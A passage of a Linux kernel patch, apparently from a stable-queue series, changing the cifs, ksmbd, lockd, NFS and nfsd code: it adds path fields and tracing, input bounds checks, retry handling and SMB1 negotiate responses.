+ 		spin_unlock(&ses->ses_lock);
+ 
+ 		++ses->ses_count;
+@@ -2365,6 +2364,7 @@ cifs_put_tcon(struct cifs_tcon *tcon)
+ 	WARN_ON(tcon->tc_count < 0);
+ 
+ 	list_del_init(&tcon->tcon_list);
++	tcon->status = TID_EXITING;
+ 	spin_unlock(&tcon->tc_lock);
+ 	spin_unlock(&cifs_tcp_ses_lock);
+ 
+@@ -2741,6 +2741,7 @@ cifs_match_super(struct super_block *sb, void *data)
+ 
+ 	spin_lock(&tcp_srv->srv_lock);
+ 	spin_lock(&ses->ses_lock);
++	spin_lock(&ses->chan_lock);
+ 	spin_lock(&tcon->tc_lock);
+ 	if (!match_server(tcp_srv, ctx) ||
+ 	    !match_session(ses, ctx) ||
+@@ -2753,6 +2754,7 @@ cifs_match_super(struct super_block *sb, void *data)
+ 	rc = compare_mount_options(sb, mnt_data);
+ out:
+ 	spin_unlock(&tcon->tc_lock);
++	spin_unlock(&ses->chan_lock);
+ 	spin_unlock(&ses->ses_lock);
+ 	spin_unlock(&tcp_srv->srv_lock);
+ 
+diff --git a/fs/cifs/fs_context.h b/fs/cifs/fs_context.h
+index bbaee4c2281f8..a268896d05d57 100644
+--- a/fs/cifs/fs_context.h
++++ b/fs/cifs/fs_context.h
+@@ -286,5 +286,5 @@ extern void smb3_update_mnt_flags(struct cifs_sb_info *cifs_sb);
+  * max deferred close timeout (jiffies) - 2^30
+  */
+ #define SMB3_MAX_DCLOSETIMEO (1 << 30)
+-#define SMB3_DEF_DCLOSETIMEO (5 * HZ) /* Can increase later, other clients use larger */
++#define SMB3_DEF_DCLOSETIMEO (1 * HZ) /* even 1 sec enough to help eg open/write/close/open/read */
+ #endif
+diff --git a/fs/cifs/link.c b/fs/cifs/link.c
+index d937eedd74fb6..c0f101fc1e5d0 100644
+--- a/fs/cifs/link.c
++++ b/fs/cifs/link.c
+@@ -360,6 +360,7 @@ smb3_query_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
+ 		.cifs_sb = cifs_sb,
++		.path = path,
+ 		.desired_access = GENERIC_READ,
+ 		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
+ 		.disposition = FILE_OPEN,
+@@ -427,6 +428,7 @@ smb3_create_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
+ 		.cifs_sb = cifs_sb,
++		.path = path,
+ 		.desired_access = GENERIC_WRITE,
+ 		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
+ 		.disposition = FILE_CREATE,
+diff --git a/fs/cifs/smb2inode.c b/fs/cifs/smb2inode.c
+index 7a2862c10afbd..c97e049e29dd3 100644
+--- a/fs/cifs/smb2inode.c
++++ b/fs/cifs/smb2inode.c
+@@ -106,6 +106,7 @@ static int smb2_compound_op(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	vars->oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = full_path,
+ 		.desired_access = desired_access,
+ 		.disposition = create_disposition,
+ 		.create_options = cifs_create_options(cifs_sb, create_options),
+diff --git a/fs/cifs/smb2ops.c b/fs/cifs/smb2ops.c
+index 0424876d22e5a..ccf311750927b 100644
+--- a/fs/cifs/smb2ops.c
++++ b/fs/cifs/smb2ops.c
+@@ -530,6 +530,14 @@ parse_server_interfaces(struct network_interface_info_ioctl_rsp *buf,
+ 	p = buf;
+ 
+ 	spin_lock(&ses->iface_lock);
++	/* do not query too frequently, this time with lock held */
++	if (ses->iface_last_update &&
++	    time_before(jiffies, ses->iface_last_update +
++			(SMB_INTERFACE_POLL_INTERVAL * HZ))) {
++		spin_unlock(&ses->iface_lock);
++		return 0;
++	}
++
+ 	/*
+ 	 * Go through iface_list and do kref_put to remove
+ 	 * any unused ifaces. ifaces in use will be removed
+@@ -696,6 +704,12 @@ SMB3_request_interfaces(const unsigned int xid, struct cifs_tcon *tcon, bool in_
+ 	struct network_interface_info_ioctl_rsp *out_buf = NULL;
+ 	struct cifs_ses *ses = tcon->ses;
+ 
++	/* do not query too frequently */
++	if (ses->iface_last_update &&
++	    time_before(jiffies, ses->iface_last_update +
++			(SMB_INTERFACE_POLL_INTERVAL * HZ)))
++		return 0;
++
+ 	rc = SMB2_ioctl(xid, tcon, NO_FILE_ID, NO_FILE_ID,
+ 			FSCTL_QUERY_NETWORK_INTERFACE_INFO,
+ 			NULL /* no data input */, 0 /* no data input */,
+@@ -703,7 +717,7 @@ SMB3_request_interfaces(const unsigned int xid, struct cifs_tcon *tcon, bool in_
+ 	if (rc == -EOPNOTSUPP) {
+ 		cifs_dbg(FYI,
+ 			 "server does not support query network interfaces\n");
+-		goto out;
++		ret_data_len = 0;
+ 	} else if (rc != 0) {
+ 		cifs_tcon_dbg(VFS, "error %d on ioctl to get interface list\n", rc);
+ 		goto out;
+@@ -731,6 +745,7 @@ smb3_qfs_tcon(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = "",
+ 		.desired_access = FILE_READ_ATTRIBUTES,
+ 		.disposition = FILE_OPEN,
+ 		.create_options = cifs_create_options(cifs_sb, 0),
+@@ -774,6 +789,7 @@ smb2_qfs_tcon(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = "",
+ 		.desired_access = FILE_READ_ATTRIBUTES,
+ 		.disposition = FILE_OPEN,
+ 		.create_options = cifs_create_options(cifs_sb, 0),
+@@ -821,6 +837,7 @@ smb2_is_path_accessible(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = full_path,
+ 		.desired_access = FILE_READ_ATTRIBUTES,
+ 		.disposition = FILE_OPEN,
+ 		.create_options = cifs_create_options(cifs_sb, 0),
+@@ -1105,6 +1122,7 @@ smb2_set_ea(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = path,
+ 		.desired_access = FILE_WRITE_EA,
+ 		.disposition = FILE_OPEN,
+ 		.create_options = cifs_create_options(cifs_sb, 0),
+@@ -2096,6 +2114,7 @@ smb3_notify(const unsigned int xid, struct file *pfile,
+ 	tcon = cifs_sb_master_tcon(cifs_sb);
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = path,
+ 		.desired_access = FILE_READ_ATTRIBUTES | FILE_READ_DATA,
+ 		.disposition = FILE_OPEN,
+ 		.create_options = cifs_create_options(cifs_sb, 0),
+@@ -2168,6 +2187,7 @@ smb2_query_dir_first(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = path,
+ 		.desired_access = FILE_READ_ATTRIBUTES | FILE_READ_DATA,
+ 		.disposition = FILE_OPEN,
+ 		.create_options = cifs_create_options(cifs_sb, 0),
+@@ -2500,6 +2520,7 @@ smb2_query_info_compound(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = path,
+ 		.desired_access = desired_access,
+ 		.disposition = FILE_OPEN,
+ 		.create_options = cifs_create_options(cifs_sb, 0),
+@@ -2634,6 +2655,7 @@ smb311_queryfs(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = "",
+ 		.desired_access = FILE_READ_ATTRIBUTES,
+ 		.disposition = FILE_OPEN,
+ 		.create_options = cifs_create_options(cifs_sb, 0),
+@@ -2928,6 +2950,7 @@ smb2_query_symlink(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = full_path,
+ 		.desired_access = FILE_READ_ATTRIBUTES,
+ 		.disposition = FILE_OPEN,
+ 		.create_options = cifs_create_options(cifs_sb, create_options),
+@@ -3068,6 +3091,7 @@ smb2_query_reparse_tag(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = full_path,
+ 		.desired_access = FILE_READ_ATTRIBUTES,
+ 		.disposition = FILE_OPEN,
+ 		.create_options = cifs_create_options(cifs_sb, OPEN_REPARSE_POINT),
+@@ -3208,6 +3232,7 @@ get_smb2_acl_by_path(struct cifs_sb_info *cifs_sb,
+ 
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = path,
+ 		.desired_access = READ_CONTROL,
+ 		.disposition = FILE_OPEN,
+ 		/*
+diff --git a/fs/cifs/smb2pdu.c b/fs/cifs/smb2pdu.c
+index 23926f754d2aa..6e6e44d8b4c79 100644
+--- a/fs/cifs/smb2pdu.c
++++ b/fs/cifs/smb2pdu.c
+@@ -225,13 +225,9 @@ smb2_reconnect(__le16 smb2_command, struct cifs_tcon *tcon,
+ 	spin_lock(&tcon->tc_lock);
+ 	if (tcon->status == TID_EXITING) {
+ 		/*
+-		 * only tree disconnect, open, and write,
+-		 * (and ulogoff which does not have tcon)
+-		 * are allowed as we start force umount.
++		 * only tree disconnect allowed when disconnecting ...
+ 		 */
+-		if ((smb2_command != SMB2_WRITE) &&
+-		   (smb2_command != SMB2_CREATE) &&
+-		   (smb2_command != SMB2_TREE_DISCONNECT)) {
++		if (smb2_command != SMB2_TREE_DISCONNECT) {
+ 			spin_unlock(&tcon->tc_lock);
+ 			cifs_dbg(FYI, "can not send cmd %d while umounting\n",
+ 				 smb2_command);
+@@ -2746,7 +2742,7 @@ int smb311_posix_mkdir(const unsigned int xid, struct inode *inode,
+ 	rqst.rq_nvec = n_iov;
+ 
+ 	/* no need to inc num_remote_opens because we close it just below */
+-	trace_smb3_posix_mkdir_enter(xid, tcon->tid, ses->Suid, CREATE_NOT_FILE,
++	trace_smb3_posix_mkdir_enter(xid, tcon->tid, ses->Suid, full_path, CREATE_NOT_FILE,
+ 				    FILE_WRITE_ATTRIBUTES);
+ 	/* resource #4: response buffer */
+ 	rc = cifs_send_recv(xid, ses, server,
+@@ -3014,7 +3010,7 @@ SMB2_open(const unsigned int xid, struct cifs_open_parms *oparms, __le16 *path,
+ 	if (rc)
+ 		goto creat_exit;
+ 
+-	trace_smb3_open_enter(xid, tcon->tid, tcon->ses->Suid,
++	trace_smb3_open_enter(xid, tcon->tid, tcon->ses->Suid, oparms->path,
+ 		oparms->create_options, oparms->desired_access);
+ 
+ 	rc = cifs_send_recv(xid, ses, server,
+diff --git a/fs/cifs/trace.h b/fs/cifs/trace.h
+index 110070ba8b04e..d3053bd8ae731 100644
+--- a/fs/cifs/trace.h
++++ b/fs/cifs/trace.h
+@@ -701,13 +701,15 @@ DECLARE_EVENT_CLASS(smb3_open_enter_class,
+ 	TP_PROTO(unsigned int xid,
+ 		__u32	tid,
+ 		__u64	sesid,
++		const char *full_path,
+ 		int	create_options,
+ 		int	desired_access),
+-	TP_ARGS(xid, tid, sesid, create_options, desired_access),
++	TP_ARGS(xid, tid, sesid, full_path, create_options, desired_access),
+ 	TP_STRUCT__entry(
+ 		__field(unsigned int, xid)
+ 		__field(__u32, tid)
+ 		__field(__u64, sesid)
++		__string(path, full_path)
+ 		__field(int, create_options)
+ 		__field(int, desired_access)
+ 	),
+@@ -715,11 +717,12 @@ DECLARE_EVENT_CLASS(smb3_open_enter_class,
+ 		__entry->xid = xid;
+ 		__entry->tid = tid;
+ 		__entry->sesid = sesid;
++		__assign_str(path, full_path);
+ 		__entry->create_options = create_options;
+ 		__entry->desired_access = desired_access;
+ 	),
+-	TP_printk("xid=%u sid=0x%llx tid=0x%x cr_opts=0x%x des_access=0x%x",
+-		__entry->xid, __entry->sesid, __entry->tid,
++	TP_printk("xid=%u sid=0x%llx tid=0x%x path=%s cr_opts=0x%x des_access=0x%x",
++		__entry->xid, __entry->sesid, __entry->tid, __get_str(path),
+ 		__entry->create_options, __entry->desired_access)
+ )
+ 
+@@ -728,9 +731,10 @@ DEFINE_EVENT(smb3_open_enter_class, smb3_##name,  \
+ 	TP_PROTO(unsigned int xid,		\
+ 		__u32	tid,			\
+ 		__u64	sesid,			\
++		const char *full_path,		\
+ 		int	create_options,		\
+ 		int	desired_access),	\
+-	TP_ARGS(xid, tid, sesid, create_options, desired_access))
++	TP_ARGS(xid, tid, sesid, full_path, create_options, desired_access))
+ 
+ DEFINE_SMB3_OPEN_ENTER_EVENT(open_enter);
+ DEFINE_SMB3_OPEN_ENTER_EVENT(posix_mkdir_enter);
+diff --git a/fs/ksmbd/auth.c b/fs/ksmbd/auth.c
+index 6e61b5bc7d86e..cead696b656a8 100644
+--- a/fs/ksmbd/auth.c
++++ b/fs/ksmbd/auth.c
+@@ -727,8 +727,9 @@ static int generate_key(struct ksmbd_conn *conn, struct ksmbd_session *sess,
+ 		goto smb3signkey_ret;
+ 	}
+ 
+-	if (conn->cipher_type == SMB2_ENCRYPTION_AES256_CCM ||
+-	    conn->cipher_type == SMB2_ENCRYPTION_AES256_GCM)
++	if (key_size == SMB3_ENC_DEC_KEY_SIZE &&
++	    (conn->cipher_type == SMB2_ENCRYPTION_AES256_CCM ||
++	     conn->cipher_type == SMB2_ENCRYPTION_AES256_GCM))
+ 		rc = crypto_shash_update(CRYPTO_HMACSHA256(ctx), L256, 4);
+ 	else
+ 		rc = crypto_shash_update(CRYPTO_HMACSHA256(ctx), L128, 4);
+diff --git a/fs/ksmbd/connection.c b/fs/ksmbd/connection.c
+index 56be077e5d8ac..2be9d7460494b 100644
+--- a/fs/ksmbd/connection.c
++++ b/fs/ksmbd/connection.c
+@@ -298,7 +298,7 @@ int ksmbd_conn_handler_loop(void *p)
+ 		kvfree(conn->request_buf);
+ 		conn->request_buf = NULL;
+ 
+-		size = t->ops->read(t, hdr_buf, sizeof(hdr_buf));
++		size = t->ops->read(t, hdr_buf, sizeof(hdr_buf), -1);
+ 		if (size != sizeof(hdr_buf))
+ 			break;
+ 
+@@ -319,13 +319,10 @@ int ksmbd_conn_handler_loop(void *p)
+ 		}
+ 
+ 		/*
+-		 * Check if pdu size is valid (min : smb header size,
+-		 * max : 0x00FFFFFF).
++		 * Check maximum pdu size(0x00FFFFFF).
+ 		 */
+-		if (pdu_size < __SMB2_HEADER_STRUCTURE_SIZE ||
+-		    pdu_size > MAX_STREAM_PROT_LEN) {
++		if (pdu_size > MAX_STREAM_PROT_LEN)
+ 			break;
+-		}
+ 
+ 		/* 4 for rfc1002 length field */
+ 		size = pdu_size + 4;
+@@ -344,7 +341,7 @@ int ksmbd_conn_handler_loop(void *p)
+ 		 * We already read 4 bytes to find out PDU size, now
+ 		 * read in PDU
+ 		 */
+-		size = t->ops->read(t, conn->request_buf + 4, pdu_size);
++		size = t->ops->read(t, conn->request_buf + 4, pdu_size, 2);
+ 		if (size < 0) {
+ 			pr_err("sock_read failed: %d\n", size);
+ 			break;
+diff --git a/fs/ksmbd/connection.h b/fs/ksmbd/connection.h
+index 3643354a3fa79..0e3a848defaf3 100644
+--- a/fs/ksmbd/connection.h
++++ b/fs/ksmbd/connection.h
+@@ -114,7 +114,8 @@ struct ksmbd_transport_ops {
+ 	int (*prepare)(struct ksmbd_transport *t);
+ 	void (*disconnect)(struct ksmbd_transport *t);
+ 	void (*shutdown)(struct ksmbd_transport *t);
+-	int (*read)(struct ksmbd_transport *t, char *buf, unsigned int size);
++	int (*read)(struct ksmbd_transport *t, char *buf,
++		    unsigned int size, int max_retries);
+ 	int (*writev)(struct ksmbd_transport *t, struct kvec *iovs, int niov,
+ 		      int size, bool need_invalidate_rkey,
+ 		      unsigned int remote_key);
+diff --git a/fs/ksmbd/smb2pdu.c b/fs/ksmbd/smb2pdu.c
+index 0f0f1243a9cbf..daaee7a89e050 100644
+--- a/fs/ksmbd/smb2pdu.c
++++ b/fs/ksmbd/smb2pdu.c
+@@ -2994,8 +2994,11 @@ int smb2_open(struct ksmbd_work *work)
+ 							sizeof(struct smb_acl) +
+ 							sizeof(struct smb_ace) * ace_num * 2,
+ 							GFP_KERNEL);
+-					if (!pntsd)
++					if (!pntsd) {
++						posix_acl_release(fattr.cf_acls);
++						posix_acl_release(fattr.cf_dacls);
+ 						goto err_out;
++					}
+ 
+ 					rc = build_sec_desc(user_ns,
+ 							    pntsd, NULL, 0,
+@@ -4951,6 +4954,10 @@ static int smb2_get_info_filesystem(struct ksmbd_work *work,
+ 
+ 		info->Attributes |= cpu_to_le32(server_conf.share_fake_fscaps);
+ 
++		if (test_share_config_flag(work->tcon->share_conf,
++		    KSMBD_SHARE_FLAG_STREAMS))
++			info->Attributes |= cpu_to_le32(FILE_NAMED_STREAMS);
++
+ 		info->MaxPathNameComponentLength = cpu_to_le32(stfs.f_namelen);
+ 		len = smbConvertToUTF16((__le16 *)info->FileSystemName,
+ 					"NTFS", PATH_MAX, conn->local_nls, 0);
+@@ -7457,13 +7464,16 @@ static int fsctl_query_allocated_ranges(struct ksmbd_work *work, u64 id,
+ 	if (in_count == 0)
+ 		return -EINVAL;
+ 
++	start = le64_to_cpu(qar_req->file_offset);
++	length = le64_to_cpu(qar_req->length);
++
++	if (start < 0 || length < 0)
++		return -EINVAL;
++
+ 	fp = ksmbd_lookup_fd_fast(work, id);
+ 	if (!fp)
+ 		return -ENOENT;
+ 
+-	start = le64_to_cpu(qar_req->file_offset);
+-	length = le64_to_cpu(qar_req->length);
+-
+ 	ret = ksmbd_vfs_fqar_lseek(fp, start, length,
+ 				   qar_rsp, in_count, out_count);
+ 	if (ret && ret != -E2BIG)
+@@ -7764,7 +7774,7 @@ int smb2_ioctl(struct ksmbd_work *work)
+ 
+ 		off = le64_to_cpu(zero_data->FileOffset);
+ 		bfz = le64_to_cpu(zero_data->BeyondFinalZero);
+-		if (off > bfz) {
++		if (off < 0 || bfz < 0 || off > bfz) {
+ 			ret = -EINVAL;
+ 			goto out;
+ 		}
+diff --git a/fs/ksmbd/smb_common.c b/fs/ksmbd/smb_common.c
+index d96da872d70a1..3d9e8d8a5762b 100644
+--- a/fs/ksmbd/smb_common.c
++++ b/fs/ksmbd/smb_common.c
+@@ -434,7 +434,7 @@ int ksmbd_extract_shortname(struct ksmbd_conn *conn, const char *longname,
+ 
+ static int __smb2_negotiate(struct ksmbd_conn *conn)
+ {
+-	return (conn->dialect >= SMB21_PROT_ID &&
++	return (conn->dialect >= SMB20_PROT_ID &&
+ 		conn->dialect <= SMB311_PROT_ID);
+ }
+ 
+@@ -442,9 +442,26 @@ static int smb_handle_negotiate(struct ksmbd_work *work)
+ {
+ 	struct smb_negotiate_rsp *neg_rsp = work->response_buf;
+ 
+-	ksmbd_debug(SMB, "Unsupported SMB protocol\n");
+-	neg_rsp->hdr.Status.CifsError = STATUS_INVALID_LOGON_TYPE;
+-	return -EINVAL;
++	ksmbd_debug(SMB, "Unsupported SMB1 protocol\n");
++
++	/*
++	 * Remove 4 byte direct TCP header, add 2 byte bcc and
++	 * 2 byte DialectIndex.
++	 */
++	*(__be32 *)work->response_buf =
++		cpu_to_be32(sizeof(struct smb_hdr) - 4 + 2 + 2);
++	neg_rsp->hdr.Status.CifsError = STATUS_SUCCESS;
++
++	neg_rsp->hdr.Command = SMB_COM_NEGOTIATE;
++	*(__le32 *)neg_rsp->hdr.Protocol = SMB1_PROTO_NUMBER;
++	neg_rsp->hdr.Flags = SMBFLG_RESPONSE;
++	neg_rsp->hdr.Flags2 = SMBFLG2_UNICODE | SMBFLG2_ERR_STATUS |
++		SMBFLG2_EXT_SEC | SMBFLG2_IS_LONG_NAME;
++
++	neg_rsp->hdr.WordCount = 1;
++	neg_rsp->DialectIndex = cpu_to_le16(work->conn->dialect);
++	neg_rsp->ByteCount = 0;
++	return 0;
+ }
+ 
+ int ksmbd_smb_negotiate_common(struct ksmbd_work *work, unsigned int command)
+@@ -465,7 +482,7 @@ int ksmbd_smb_negotiate_common(struct ksmbd_work *work, unsigned int command)
+ 		}
+ 	}
+ 
+-	if (command == SMB2_NEGOTIATE_HE && __smb2_negotiate(conn)) {
++	if (command == SMB2_NEGOTIATE_HE) {
+ 		ret = smb2_handle_negotiate(work);
+ 		init_smb2_neg_rsp(work);
+ 		return ret;
+diff --git a/fs/ksmbd/smb_common.h b/fs/ksmbd/smb_common.h
+index 318c16fa81da3..c1f3006792ff6 100644
+--- a/fs/ksmbd/smb_common.h
++++ b/fs/ksmbd/smb_common.h
+@@ -158,8 +158,15 @@
+ 
+ #define SMB1_PROTO_NUMBER		cpu_to_le32(0x424d53ff)
+ #define SMB_COM_NEGOTIATE		0x72
+-
+ #define SMB1_CLIENT_GUID_SIZE		(16)
++
++#define SMBFLG_RESPONSE 0x80	/* this PDU is a response from server */
++
++#define SMBFLG2_IS_LONG_NAME	cpu_to_le16(0x40)
++#define SMBFLG2_EXT_SEC		cpu_to_le16(0x800)
++#define SMBFLG2_ERR_STATUS	cpu_to_le16(0x4000)
++#define SMBFLG2_UNICODE		cpu_to_le16(0x8000)
++
+ struct smb_hdr {
+ 	__be32 smb_buf_length;
+ 	__u8 Protocol[4];
+@@ -199,28 +206,7 @@ struct smb_negotiate_req {
+ struct smb_negotiate_rsp {
+ 	struct smb_hdr hdr;     /* wct = 17 */
+ 	__le16 DialectIndex; /* 0xFFFF = no dialect acceptable */
+-	__u8 SecurityMode;
+-	__le16 MaxMpxCount;
+-	__le16 MaxNumberVcs;
+-	__le32 MaxBufferSize;
+-	__le32 MaxRawSize;
+-	__le32 SessionKey;
+-	__le32 Capabilities;    /* see below */
+-	__le32 SystemTimeLow;
+-	__le32 SystemTimeHigh;
+-	__le16 ServerTimeZone;
+-	__u8 EncryptionKeyLength;
+ 	__le16 ByteCount;
+-	union {
+-		unsigned char EncryptionKey[8]; /* cap extended security off */
+-		/* followed by Domain name - if extended security is off */
+-		/* followed by 16 bytes of server GUID */
+-		/* then security blob if cap_extended_security negotiated */
+-		struct {
+-			unsigned char GUID[SMB1_CLIENT_GUID_SIZE];
+-			unsigned char SecurityBlob[1];
+-		} __packed extended_response;
+-	} __packed u;
+ } __packed;
+ 
+ struct filesystem_attribute_info {
+diff --git a/fs/ksmbd/transport_rdma.c b/fs/ksmbd/transport_rdma.c
+index 096eda9ef873b..c06efc020bd95 100644
+--- a/fs/ksmbd/transport_rdma.c
++++ b/fs/ksmbd/transport_rdma.c
+@@ -670,7 +670,7 @@ static int smb_direct_post_recv(struct smb_direct_transport *t,
+ }
+ 
+ static int smb_direct_read(struct ksmbd_transport *t, char *buf,
+-			   unsigned int size)
++			   unsigned int size, int unused)
+ {
+ 	struct smb_direct_recvmsg *recvmsg;
+ 	struct smb_direct_data_transfer *data_transfer;
+diff --git a/fs/ksmbd/transport_tcp.c b/fs/ksmbd/transport_tcp.c
+index 603893fd87f57..20e85e2701f26 100644
+--- a/fs/ksmbd/transport_tcp.c
++++ b/fs/ksmbd/transport_tcp.c
+@@ -291,16 +291,18 @@ static int ksmbd_tcp_run_kthread(struct interface *iface)
+ 
+ /**
+  * ksmbd_tcp_readv() - read data from socket in given iovec
+- * @t:		TCP transport instance
+- * @iov_orig:	base IO vector
+- * @nr_segs:	number of segments in base iov
+- * @to_read:	number of bytes to read from socket
++ * @t:			TCP transport instance
++ * @iov_orig:		base IO vector
++ * @nr_segs:		number of segments in base iov
++ * @to_read:		number of bytes to read from socket
++ * @max_retries:	maximum retry count
+  *
+  * Return:	on success return number of bytes read from socket,
+  *		otherwise return error number
+  */
+ static int ksmbd_tcp_readv(struct tcp_transport *t, struct kvec *iov_orig,
+-			   unsigned int nr_segs, unsigned int to_read)
++			   unsigned int nr_segs, unsigned int to_read,
++			   int max_retries)
+ {
+ 	int length = 0;
+ 	int total_read;
+@@ -308,7 +310,6 @@ static int ksmbd_tcp_readv(struct tcp_transport *t, struct kvec *iov_orig,
+ 	struct msghdr ksmbd_msg;
+ 	struct kvec *iov;
+ 	struct ksmbd_conn *conn = KSMBD_TRANS(t)->conn;
+-	int max_retry = 2;
+ 
+ 	iov = get_conn_iovec(t, nr_segs);
+ 	if (!iov)
+@@ -335,14 +336,23 @@ static int ksmbd_tcp_readv(struct tcp_transport *t, struct kvec *iov_orig,
+ 		} else if (conn->status == KSMBD_SESS_NEED_RECONNECT) {
+ 			total_read = -EAGAIN;
+ 			break;
+-		} else if ((length == -ERESTARTSYS || length == -EAGAIN) &&
+-			   max_retry) {
++		} else if (length == -ERESTARTSYS || length == -EAGAIN) {
++			/*
++			 * If max_retries is negative, Allow unlimited
++			 * retries to keep connection with inactive sessions.
++			 */
++			if (max_retries == 0) {
++				total_read = length;
++				break;
++			} else if (max_retries > 0) {
++				max_retries--;
++			}
++
+ 			usleep_range(1000, 2000);
+ 			length = 0;
+-			max_retry--;
+ 			continue;
+ 		} else if (length <= 0) {
+-			total_read = -EAGAIN;
++			total_read = length;
+ 			break;
+ 		}
+ 	}
+@@ -358,14 +368,15 @@ static int ksmbd_tcp_readv(struct tcp_transport *t, struct kvec *iov_orig,
+  * Return:	on success return number of bytes read from socket,
+  *		otherwise return error number
+  */
+-static int ksmbd_tcp_read(struct ksmbd_transport *t, char *buf, unsigned int to_read)
++static int ksmbd_tcp_read(struct ksmbd_transport *t, char *buf,
++			  unsigned int to_read, int max_retries)
+ {
+ 	struct kvec iov;
+ 
+ 	iov.iov_base = buf;
+ 	iov.iov_len = to_read;
+ 
+-	return ksmbd_tcp_readv(TCP_TRANS(t), &iov, 1, to_read);
++	return ksmbd_tcp_readv(TCP_TRANS(t), &iov, 1, to_read, max_retries);
+ }
+ 
+ static int ksmbd_tcp_writev(struct ksmbd_transport *t, struct kvec *iov,
+diff --git a/fs/lockd/clnt4xdr.c b/fs/lockd/clnt4xdr.c
+index 7df6324ccb8ab..8161667c976f8 100644
+--- a/fs/lockd/clnt4xdr.c
++++ b/fs/lockd/clnt4xdr.c
+@@ -261,7 +261,6 @@ static int decode_nlm4_holder(struct xdr_stream *xdr, struct nlm_res *result)
+ 	u32 exclusive;
+ 	int error;
+ 	__be32 *p;
+-	s32 end;
+ 
+ 	memset(lock, 0, sizeof(*lock));
+ 	locks_init_lock(fl);
+@@ -285,13 +284,7 @@ static int decode_nlm4_holder(struct xdr_stream *xdr, struct nlm_res *result)
+ 	fl->fl_type  = exclusive != 0 ? F_WRLCK : F_RDLCK;
+ 	p = xdr_decode_hyper(p, &l_offset);
+ 	xdr_decode_hyper(p, &l_len);
+-	end = l_offset + l_len - 1;
+-
+-	fl->fl_start = (loff_t)l_offset;
+-	if (l_len == 0 || end < 0)
+-		fl->fl_end = OFFSET_MAX;
+-	else
+-		fl->fl_end = (loff_t)end;
++	nlm4svc_set_file_lock_range(fl, l_offset, l_len);
+ 	error = 0;
+ out:
+ 	return error;
+diff --git a/fs/lockd/xdr4.c b/fs/lockd/xdr4.c
+index 712fdfeb8ef06..5fcbf30cd2759 100644
+--- a/fs/lockd/xdr4.c
++++ b/fs/lockd/xdr4.c
+@@ -33,6 +33,17 @@ loff_t_to_s64(loff_t offset)
+ 	return res;
+ }
+ 
++void nlm4svc_set_file_lock_range(struct file_lock *fl, u64 off, u64 len)
++{
++	s64 end = off + len - 1;
++
++	fl->fl_start = off;
++	if (len == 0 || end < 0)
++		fl->fl_end = OFFSET_MAX;
++	else
++		fl->fl_end = end;
++}
++
+ /*
+  * NLM file handles are defined by specification to be a variable-length
+  * XDR opaque no longer than 1024 bytes. However, this implementation
+@@ -80,7 +91,7 @@ svcxdr_decode_lock(struct xdr_stream *xdr, struct nlm_lock *lock)
+ 	locks_init_lock(fl);
+ 	fl->fl_flags = FL_POSIX;
+ 	fl->fl_type  = F_RDLCK;
+-
++	nlm4svc_set_file_lock_range(fl, lock->lock_start, lock->lock_len);
+ 	return true;
+ }
+ 
+diff --git a/fs/nfs/read.c b/fs/nfs/read.c
+index 8ae2c8d1219d8..cd970ce62786b 100644
+--- a/fs/nfs/read.c
++++ b/fs/nfs/read.c
+@@ -15,6 +15,7 @@
+ #include <linux/stat.h>
+ #include <linux/mm.h>
+ #include <linux/slab.h>
++#include <linux/task_io_accounting_ops.h>
+ #include <linux/pagemap.h>
+ #include <linux/sunrpc/clnt.h>
+ #include <linux/nfs_fs.h>
+@@ -338,6 +339,7 @@ int nfs_read_folio(struct file *file, struct folio *folio)
+ 
+ 	trace_nfs_aop_readpage(inode, page);
+ 	nfs_inc_stats(inode, NFSIOS_VFSREADPAGE);
++	task_io_account_read(folio_size(folio));
+ 
+ 	/*
+ 	 * Try to flush any pending writes to the file..
+@@ -400,6 +402,7 @@ void nfs_readahead(struct readahead_control *ractl)
+ 
+ 	trace_nfs_aop_readahead(inode, readahead_pos(ractl), nr_pages);
+ 	nfs_inc_stats(inode, NFSIOS_VFSREADPAGES);
++	task_io_account_read(readahead_length(ractl));
+ 
+ 	ret = -ESTALE;
+ 	if (NFS_STALE(inode))
+diff --git a/fs/nfsd/vfs.c b/fs/nfsd/vfs.c
+index 59f9a8cee012a..dc3ba13546dd6 100644
+--- a/fs/nfsd/vfs.c
++++ b/fs/nfsd/vfs.c
+@@ -874,8 +874,15 @@ nfsd_splice_actor(struct pipe_inode_info *pipe, struct pipe_buffer *buf,
+ 	struct page *last_page;
+ 
+ 	last_page = page + (offset + sd->len - 1) / PAGE_SIZE;
+-	for (page += offset / PAGE_SIZE; page <= last_page; page++)
++	for (page += offset / PAGE_SIZE; page <= last_page; page++) {
++		/*
++		 * Skip page replacement when extending the contents
++		 * of the current page.
++		 */
++		if (page == *(rqstp->rq_next_page - 1))
++			continue;
+ 		svc_rqst_replace_page(rqstp, page);
++	}
